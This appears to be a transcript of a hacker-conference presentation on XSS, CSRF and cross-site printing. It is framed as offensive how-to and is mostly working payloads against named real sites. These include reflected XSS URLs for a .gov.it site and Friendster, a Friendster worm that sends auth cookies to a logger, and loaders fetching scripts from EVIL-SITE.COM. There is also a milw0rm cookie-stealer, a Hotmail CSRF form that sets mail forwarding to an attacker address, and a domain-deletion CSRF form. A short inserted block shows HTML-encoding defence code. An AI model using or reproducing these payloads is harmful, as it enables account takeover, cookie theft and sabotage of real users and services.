Source: Hacker's Night Day presentation by Anselmus Ricky (Th0R)
Title: The X
~ Cross Site Scripting (XSS)
~ Cross Site Request Forgery (CSRF)
~ Cross Site Printing (XSP)
~ Malicious JavaScript
The payload of XSS, CSRF and/or XSP attacks, typically written in JavaScript and executed in the browser.
Cross Site Scripting (XSS)
Forcing malicious content to be served by a trusted website to an unsuspecting user.
Being hacked with Cross Site Scripting (XSS) attacks!
~ The website owner embedded malicious JavaScript in his own website.
~ The website was defaced with embedded JavaScript malware.
~ JavaScript malware was injected into a public area of a website (Persistent XSS).
~ Clicking a specially crafted link causes the website to echo JavaScript malware back to the user (Non-Persistent XSS).
Types of XSS
~ Persistent XSS
The persistent or Type 2 XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A Type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location) and later displayed to users in a web page without being encoded using HTML entities.
~ Non-persistent XSS
The non-persistent or Type 1 cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user, again without HTML entity encoding.
Non-persistent XSS
Example:
http://protocollo.gov.it/01RiepIni.asp?NI="><script>alert("Th0R%20was%20Here!")</script>
http://www.friendster.com/gallery.php?_ ... own&kword=[PUT XSS CODE HERE]
http://www.friendster.com/gallery.php?_ ... Fscript%3E
http://www.friendster.com/gallery.php?_ ... /script%3E
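The defence the two definitions above point at is the same for the stored (Type 2) and reflected (Type 1) cases: entity-encode user data at the moment it is written into HTML. The following is an added example, not code from the presentation; it reuses the NI parameter name from the first URL above and everything else (template, payload string) is constructed.

```javascript
// Added example: reflecting a query parameter into an HTML attribute,
// first verbatim (the reflected XSS above) and then HTML-entity encoded.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the five characters that can change HTML structure or end an attribute.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ENTITY[ch]);
}

// Vulnerable: the value from the URL lands inside the attribute unchanged,
// so a leading "> closes the attribute and the tag and starts a <script>.
function renderVulnerable(ni) {
  return `<input name="NI" value="${ni}">`;
}

// Hardened: encode at output time. This is the same step whether the value
// came straight from the request (Type 1) or from the database (Type 2).
function renderSafe(ni) {
  return `<input name="NI" value="${encodeHtml(ni)}">`;
}

// Detection helper for the test below: did a <script> element end up in the markup?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Constructed payload with the same shape as the first URL above.
const payload = '"><script>alert("test")</script>';

console.log(renderVulnerable(payload)); // script element appears in the page
console.log(renderSafe(payload));       // value stays inert text inside the attribute
```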
File.js
var pUrl=window.location.href.search(/profiles\./),pV=pageViewerID,pO=pageOwnerID,pN=pageViewerFName;
var cLoger="YOUR_LOGER_FILE.PHP",ck=fgetCookie("friendster_auth");
fr=document.createElement('iframe');
fr.height='0';fr.width='0';fr.frameBorder='0';
fr.src=cLoger+'?c='+escape(ck)+'&s='+escape(pN)+'~'+pV+'~@'+pO;navigation.appendChild(fr);
Filejs2.txt
fr=document.createElement('iframe');fr.height='0';fr.width='0';fr.frameBorder='0';fr.src='http://www.friendster.com/gallery.php?_submitted=1&ktype=hometown&kword=%3C/script%3E%3Cscript%20src%3D%22http%3A//EVIL-SITE.COM/filejs.js%22%3E%3C/script%3E';flo1t.appendChild(fr);
Injected Code
<img xmlns:dict="dict" alt="star" src="http://images.friendster.com/images/rating_star.gif" onLoaD ="a=document.createElement('script');a.src='http://EVIL-SITE.COM/filejs2.txt';flo1t.appendChild(a)" style=height:0;width:0>
Example:
~ Bulletin board attack (where HTML posting is allowed).
~ <pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >
~ Email hacking (tested on Yahoo and Gmail quite a long time ago).
~ etc.
Cross Site Request Forgery (CSRF)
Also known as XSRF, 1-click attack or sidejacking: forcing an unsuspecting user's browser to send requests they didn't intend.
Using Cross Site Request Forgery (CSRF) to hack!
~ Can be used to hack/break into several free mail providers in the world, such as http://www.hotmail.com
~ If you want to send someone to jail just because they clicked on your built-up links, then you can do it with CSRF! I myself name it 1-Click to Jail!
~ CSRF attacks are also usable for boosting other kinds of attacks such as Denial of Service (DoS) and/or Distributed Denial of Service (DDoS).
CSRF on Hotmail Video
Can be downloaded here:
http://www.th0r.info/products/clip0001.rar
CSRF on Hotmail Hacking
~ *.html files attached within emails:
<html>
<body>
<bOdy onload="document.CSRF.submit()">
<form name="CSRF" method="POST" action="http://by138w.bay138.mail.live.com/mail/options.aspx?subsection=32&n=487173350&resend=0" style="display:none">
</body>
</html>
~ Actual link:
http://by111w.bay111.mail.live.com/mail ... ection=32&n=487173350&resend=0&gs=true&ctl02%24SaveButton=true%ctl02%24ForwardingToggle=2&ctl02%24AddressTextBox=binus_2_0_0_4@hotmail.com
Better clue: "You need an iFrame"
Doing DoS by using CSRF
All the equipment you need:
~ A browser (can be IE/Firefox/Safari/etc.).
~ A website that generates a sitemap for you.
~ A little program to do the looping.
~ Your hands and eyes to watch over the victim's website.
Annoying CSRF
Look at this:
<form name="f" action="http://www.uni.cc/site/dcp_ddelete1.php" method="POST">
<input type="hidden" name="DN" value="testdoank.uni.cc">
<input type="submit" name="s" class="btn" value="Click here to see my HOT Pics">
</form>
<script language="javascript">
document.forms[0].submit()
</script>
Cross Site Printing (XSP)
Forcing malicious content to be served by a trusted website into a specific intranet network and its unsuspecting printers.
What can you do with Cross Site Printing?!
<FORM Action='http://YOURPRINTER:9100' ID='MsgForm' ENCTYPE='Multipart/Form-data' Method='POST'> <TEXTAREA NAME='MSG' ID='MSG' WRAP='NONE' ROWS='50' COLS='100'> Testing this printer out. </TEXTAREA><INPUT TYPE=SUBMIT Value=SUBMIT></FORM>
Most of today's Cross Site Scripting attacks use this kind of trick:
http://bbs.cn.yahoo.com/searchApplyBoar ... 0Pg==.html
Translated into human tongue as: <script>alert("XSS-bypass-No-Script")</script>
Sorry, I can't translate this; anyway you'll surely understand a bit of it...
And really sorry if it's presumptuous of me to go ahead and post this directly...